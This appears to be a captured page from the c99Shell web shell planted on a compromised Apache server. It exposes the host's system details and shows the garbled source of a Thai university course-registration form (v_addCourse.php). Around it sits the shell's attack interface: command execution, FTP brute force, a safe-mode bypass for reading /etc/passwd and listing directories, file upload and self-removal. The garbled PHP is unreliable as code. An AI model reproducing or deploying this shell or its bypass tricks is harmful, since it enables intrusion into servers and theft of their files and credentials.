!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_addCourse.php (16.18 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$crsId 
"";
$crsCode "";
$crsCodeE "";
$crsName "";
$crsNameE "";
$crsAbbr "";
$crsAbbrE "";
$crsDescription "";
$crsDescriptionE "";
$crsCreditTotal "";
$crsCredit1 "";
$crsCredit2 "";
$crsPeriod1 "";
$crsPeriod2 "";
$crsPeriod3 "";
$crsUnit "";
$crsShowLabInTS "Y";
$crsStatus "";
$crsCdId "";
$crsGtpId "";

if(
$qu_crs->num_rows()) {
    
$row $qu_crs->row();
    
$crsId $row->crsId;
    
$crsCode $row->crsCode;
    
$crsCodeE $row->crsCodeE;
    
$crsName $row->crsName;
    
$crsNameE $row->crsNameE;
    
$crsAbbr $row->crsAbbr;
    
$crsAbbrE $row->crsAbbrE;
    
$crsDescription $row->crsDescription;
    
$crsDescriptionE $row->crsDescriptionE;
    
$crsCreditTotal $row->crsCreditTotal;
    
$crsCredit1 $row->crsCredit1;
    
$crsCredit2 $row->crsCredit2;
    
$crsPeriod1 $row->crsPeriod1;
    
$crsPeriod2 $row->crsPeriod2;
    
$crsPeriod3 $row->crsPeriod3;
    
$crsUnit $row->crsUnit;
    
$crsShowLabInTS $row->crsShowLabInTS;
    
$crsStatus $row->crsStatus;
    
$crsCdId $row->crsCdId;
    
$crsGtpId $row->crsGtpId;
    
    
$cpub = ($cp->num_rows()>0)? "Y":"N";
}

$crsId2 "";
$crsName2 "";
$prcAndOr2 "";
if(
$qu_prc2->num_rows()>0) {
    
$row $qu_prc2->row();
    
$crsId2 $row->crsId;
    
$crsName2 $row->crsCode." ".explodeSquare($row->crsName);
    
$prcAndOr2 $row->prcAndOr;
}

$crsId3 "";
$crsName3 "";
$prcAndOr3 "";
if(
$qu_prc3->num_rows()>0) {
    
$row $qu_prc3->row();
    
$crsId3 $row->crsId;
    
$crsName3 $row->crsCode." ".explodeSquare($row->crsName);
    
$prcAndOr3 $row->prcAndOr;
}

$crsId4 "";
$crsName4 "";
$prcAndOr4 "";
if(
$qu_prc4->num_rows()>0) {
    
$row $qu_prc4->row();
    
$crsId4 $row->crsId;
    
$crsName4 $row->crsCode." ".explodeSquare($row->crsName);
    
$prcAndOr4 $row->prcAndOr;
}

$crsId5 "";
$crsName5 "";
if(
$qu_prc5->num_rows()>0) {
    
$row $qu_prc5->row();
    
$crsId5 $row->crsId;
    
$crsName5 $row->crsCode." ".explodeSquare($row->crsName);
}
?>
<table width="95%" align="center">
    <tr>
        <td>
            <div align="center"><br>
            <table width="100%" class="szone">

                <tr>
                    <td align="right"><?php echo form_open($this->config->item("rg_folder")."curpbri/crs_show");?><b>รหัสรายวิชา</b>
                    <input type="text" name="crsCodeSearch" size="10" />
                    <b>ชื่อรายวิชา</b>
                    <input type="text" name="crsNameSearch" />
                    <input type="submit" name="search" value="ค้นหา" />
                    <?php echo form_close();?></td>
                </tr>
                <tr bgcolor="<?=$tr_color_even?>">
                    <td align="left" class="coltd_szone">
<?php
                    $total 
$rs_totalRecord->num_rows();
                    echo 
"<b>รายวิชาทั้งหมด</b> $total รายการ";
?>
                    </td>
                </tr>
                <tr>
                    <td align="center" ><?php echo form_open($this->config->item("rg_folder")."curpbri/crs_insert_update", array("name" => "myform""id" => "myform"));?>&nbsp;</td>
                </tr>
                <tr>
                    <td align="center" height="22"><span class="h error">
                       บันทึกรายวิชาใหม่<br></span>
                    </td>
                </tr>
                <tr>
                    <td align="center" ><br></td>
                </tr>
                <tr>
                    <td><table width="100%" class="szone">
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รหัสรายวิชา (ไทย)</td>
                            <td><input type="text" class="required-thai" name="crsCode" id="crsCode" value="<?php echo (set_value('crsCode')=="") ? $crsCode set_value('crsCode');?>" size="10" />
                            *
                            <div><?php echo form_error("crsCode");?></div><span class="error"></span></td>
                            <td class="coltd_szone">รหัสรายวิชา (อังกฤษ)</td>
                            <td><input type="text" class="required-eng" name="crsCodeE" id="crsCodeE" value="<?php echo (set_value('crsCodeE')=="") ? $crsCodeE set_value('crsCodeE');?>" size="10" />
                            *
                            <div><?php echo form_error("crsCodeE");?></div><span class="error"></span></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ชื่อรายวิชา (ไทย)</td>
                            <td><input type="text" name="crsName" class="required-thai" id="crsName" value="<?php echo explodeSquare((set_value('crsName')=="") ? $crsName set_value('crsName'));?>" size="20" />
                             *
                            <div><?php echo form_error("crsName");?></div><span class="error"></span></td>
                            <td class="coltd_szone">ชื่อรายวิชา (อังกฤษ)</td>
                            <td><input type="text" name="crsNameE" class="required-eng" id="crsNameE" value="<?php echo explodeSquare((set_value('crsNameE')=="") ? $crsNameE set_value('crsNameE'));?>" size="20" />
                            *
                            <div><?php echo form_error("crsNameE");?></div><span class="error"></span></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <!-- ไม่แน่วใจว่าต้องดักไหม class="required-thai",class="required-eng,<span class="error"></span>"!-->
                            <td class="coltd_szone">ชื่อย่อรายวิชา (ไทย)</td>
                            <td><input type="text" name="crsAbbr" id="crsAbbr" value="<?php echo (set_value('crsAbbr')=="") ? $crsAbbr set_value('crsAbbr');?>" size="10" /></td>
                            <td class="coltd_szone">ชื่อย่อรายวิชา (อังกฤษ)</td>
                            <td><input type="text" name="crsAbbrE" id="crsAbbrE" value="<?php echo (set_value('crsAbbrE')=="") ? $crsAbbrE set_value('crsAbbrE');?>" size="10" /></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">สาระสำคัญของรายวิชา (ไทย)</td>
                            <td><textarea name="crsDescription" id="crsDescription" cols="20%" rows="5"><?php echo (set_value('crsDescription')=="") ? $crsDescription set_value("crsDescription");?></textarea></td>
                            <td class="coltd_szone">สาระสำคัญของรายวิชา (อังกฤษ)</td>
                            <td><textarea name="crsDescriptionE" id="crsDescriptionE" cols="20%" rows="5"><?php echo (set_value('crsDescriptionE')=="") ? $crsDescriptionE set_value("crsDescriptionE");?></textarea></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">จำนวนหน่วยกิตรวม</td>
                            <td>
                            <?if(isset($cpub) and $cpub=='Y'){
                            
$val = (set_value('crsCreditTotal')=="") ? $crsCreditTotal set_value('crsCreditTotal');
                            echo 
$val;
                            echo 
"<input type=\"hidden\" name=\"crsCreditTotal\" id=\"crsCreditTotal\" value=\"$val\">";
                            
                            }else{
?>
                                <input type="text" name="crsCreditTotal" class="required-int" id="crsCreditTotal" value="<?php echo (set_value('crsCreditTotal')=="") ? $crsCreditTotal set_value('crsCreditTotal');?>" size="2" maxlength="2" />
                                *
                                <div><?php echo form_error("crsCreditTotal");?></div><span class="error"></span>
                            <?}?>
                            </td>
                            <td class="coltd_szone">จำนวนชั่วโมงทฤษฎี</td>
                            <td>
                            <?if(isset($cpub) and $cpub=='Y'){
                                
$val = (set_value('crsPeriod1')=="") ? $crsPeriod1 set_value('crsPeriod1');
                                echo 
$val;
                                echo 
"<input type=\"hidden\" name=\"crsPeriod1\" id=\"crsPeriod1\" value=\"$val\">";
                            }else{
?>
                            <input type="text" name="crsPeriod1" class="required-int" id="crsPeriod1" value="<?php echo (set_value('crsPeriod1')=="") ? $crsPeriod1 set_value('crsPeriod1');?>" size="2" maxlength="2" />
                            *
                            <div><?php echo form_error("crsPeriod1");?></div><span class="error"></span>
                            <?}?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">จำนวนชั่วโมงทดลอง/ปฏิบัติ</td>
                            <td>
                            <?if(isset($cpub) and $cpub=='Y'){
                                
$val = (set_value('crsPeriod2')=="") ? $crsPeriod2 set_value('crsPeriod2');
                                echo 
$val;
                                echo 
"<input type=\"hidden\" name=\"crsPeriod2\" id=\"crsPeriod2\" value=\"$val\">";
                            }else{
?>
                            <input type="text" name="crsPeriod2" class="required-int" id="crsPeriod2" value="<?php echo (set_value('crsPeriod2')=="") ? $crsPeriod2 set_value('crsPeriod2');?>" size="2" maxlength="2" />
                            *
                            <div><?php echo form_error("crsPeriod2");?></div><span class="error"></span>
                            <?}?>
                            </td>
                            <td class="coltd_szone">จำนวนชั่วโมงศึกษาด้วยตนเอง</td>
                            <td>
                            <?if(isset($cpub) and $cpub=='Y'){
                                
$val = (set_value('crsPeriod3')=="") ? $crsPeriod3 set_value('crsPeriod3');
                                echo 
$val;
                                echo 
"<input type=\"hidden\" name=\"crsPeriod3\" id=\"crsPeriod3\" value=\"$val\">";
                            }else{
?>
                            <input type="text" name="crsPeriod3" class="required-int" id="crsPeriod3" value="<?php echo (set_value('crsPeriod3')=="") ? $crsPeriod3 set_value('crsPeriod3');?>" size="2" maxlength="2" />
                            *
                            <div><?php echo form_error("crsPeriod3");?></div><span class="error"></span>
                            <?}?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">แสดงชั่วโมงฝึกปฏิบัติ<br>ในใบรายงานผลการศึกษา</td>
                            <td>
                            <input type="radio" name="crsShowLabInTS" id="crsShowLabInTS" value="Y" <?php echo ($crsShowLabInTS=='Y') ? "checked" "checked"?> />ต้องการ
                            <input type="radio" name="crsShowLabInTS" id="crsShowLabInTS" value="N" <?php echo ($crsShowLabInTS=='N') ? "checked" ""?> />ไม่ต้องการ</td>
                            <td class="coltd_szone">หมวดวิชา</td>
                            <td>
                            <?if(isset($cpub) and $cpub=='Y'){
                                foreach(
$rs_cd->result() as $row) {
                                    echo (
$row->cdId==$crsCdId) ? $row->cdName "";
                                    echo (
$row->cdId==$crsCdId) ? "<input type=\"hidden\" name=\"crsCdId\" id=\"crsCdId\" value=\"$row->cdId\">" "";
                                }
                            }else{
?>
                            <select name="crsCdId">
                                <option value=""></option>
<?php
                                
foreach($rs_cd->result() as $row) {
?>
                                <option title="<?php echo "(".$row->cdId.") ".$row->cdNameE;?>" value="<?php echo $row->cdId;?><?php echo ($row->cdId==$crsCdId) ? "selected=\"selected\"" "";?>><?php echo $row->cdName;?></option>
<?php
                                
}
?>
                            </select>
                            *
                            <?php echo form_error("crsCdId");
                            }
                            
?>
                            </td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รูปแบบเกรด</td>
                            <td colspan="3"><select name="crsGtpId">
                                <option value=""></option>
<?php
                                
foreach($rs_gt->result() as $row) {
?>
                                <option value="<?php echo $row->gtpId;?><?php echo ($row->gtpId==$crsGtpId) ? "selected=\"selected\"" "";?>><?php echo $row->gtpName;?></option>
<?php
                                
}
?>
                            </select> *<div><span class="error"><?php echo form_error('crsGtpId');?></span></div></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">สถานะรายวิชา</td>
                            <td colspan="3"><input type="checkbox" name="crsStatus" id="crsStatus" value="Y" <?php echo ($crsStatus=='Y') ? "checked" "";?> />
                            <font size="2"><label for="crsStatus">ใช้ชั่วคราวในโปรแกรมการศึกษา</label></font></td>
                        </tr>
                        <tr  bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รายวิชาที่ต้องเรียนก่อน 1</td>
                            <td colspan="3"><input type="text" name="crsName2" id="crsName2" value="<?php echo explodeSquare((set_value('crsName2')=="") ? $crsName2 set_value('crsName2'));?>" size="50" class="input1" readonly />
                            <!--<input type="hidden" id="seq2" name="seq2" value="2">!-->
<?php
                            
echo anchor_popup($this->config->item("rg_folder")."curpbri/crs_popup/2""<img src=\"".base_url().$this->config->item("rg_search")."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "500""height" => "500"));
?>
                            <input type="hidden" name="crsId2" id="crsId2" value="<?php echo (set_value('crsId2')=="") ? $crsId2 set_value('crsId2');?>" /></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td colspan="3"></td>
                            <td>
                            <input type="radio" name="prcAndOr2" id="prcAndOr2" value="A" <?php echo ($prcAndOr2=='A') ? "checked" "";?> />และ
                            <input type="radio" name="prcAndOr2" id="prcAndOr2" value="O" <?php echo ($prcAndOr2=='O') ? "checked" "";?> />หรือ</td>
                        </tr>
                        <tr  bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รายวิชาที่ต้องเรียนก่อน 2</td>
                            <td colspan="3"><input type="text" name="crsName3" id="crsName3" value="<?php echo explodeSquare((set_value('crsName3')=="") ? $crsName3 set_value('crsName3'));?>" size="50" class="input1" readonly />
                            <!--<input type="hidden" id="seq3" name="seq3" value="3">!-->
<?php                        
                            
echo anchor_popup($this->config->item("rg_folder")."curpbri/crs_popup/3""<img src=\"".base_url().$this->config->item("rg_search")."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "500""height" => "500"));
?>
                            <input type="hidden" name="crsId3" id="crsId3" value="<?php echo (set_value('crsId3')=="") ? $crsId3 set_value('crsId3');?>" /></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td colspan="3"></td>
                            <td>
                            <input type="radio" name="prcAndOr3" id="prcAndOr3" value="A" <?php echo ($prcAndOr3=='A') ? "checked" ""?> />และ
                            <input type="radio" name="prcAndOr3" id="prcAndOr3" value="O" <?php echo ($prcAndOr3=='O') ? "checked" ""?> />หรือ</td>
                        </tr>
                        <tr  bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รายวิชาที่ต้องเรียนก่อน 3</td>
                            <td colspan="3"><input type="text" name="crsName4" id="crsName4" value="<?php echo explodeSquare((set_value('crsName4')=="") ? $crsName4 set_value('crsName4'));?>" size="50" class="input1" readonly />
                            <!--<input type="hidden" id="seq4" name="seq4" value="4">!-->
                            <?php
                            
echo anchor_popup($this->config->item("rg_folder")."curpbri/crs_popup/4""<img src=\"".base_url().$this->config->item("rg_search")."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "500""height" => "500"));
?>
                            <input type="hidden" name="crsId4" id="crsId4" value="<?php echo (set_value('crsId4')=="") ? $crsId4 set_value('crsId4');?>" /></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td colspan="3"></td>
                            <td>
                            <input type="radio" name="prcAndOr4" id="prcAndOr4" value="A" <?php echo ($prcAndOr4=='A') ? "checked" ""?> />และ
                            <input type="radio" name="prcAndOr4" id="prcAndOr4" value="O" <?php echo ($prcAndOr4=='O') ? "checked" ""?> />หรือ</td>
                        </tr>
                        <tr  bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รายวิชาที่ต้องเรียนก่อน 4</td>
                            <td colspan="3"><input type="text" name="crsName5" id="crsName5" value="<?php echo explodeSquare((set_value('crsName5')=="") ? $crsName5 set_value('crsName5'));?>" size="50" class="input1" readonly />
<?php
                            
echo anchor_popup($this->config->item("rg_folder")."curpbri/crs_popup/5""<img src=\"".base_url().$this->config->item("rg_search")."\" width=\"15\" height=\"19\" align=\"absmiddle\" border=\"0\" />", array("width" => "500""height" => "500"));
?>
                            <input type="hidden" name="crsId5" id="crsId5" value="<?php echo (set_value('crsId5')=="") ? $crsId5 set_value('crsId5');?>" /></td>
                        </tr>
                    </table></td>
                </tr>
                <tr>
                    <td align="center"><br><input type="hidden" name="crsId" id="crsId" value="<?php echo (set_value('crsId')=="") ? $crsId set_value('crsId');?>" /><input type="submit" name="add" value="บันทึก" id="subbt" />
                    <input type="reset" name="clear" value="เคลียร์ข้อมูล" /><?php echo form_close();?>
                    </td>
                </tr>
            </table></div>
        <br><span class="error"><b>หมายเหตุ : </b>* หมายถึง ต้องกรอกข้อมูลให้สมบูรณ์</span></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0172 ]--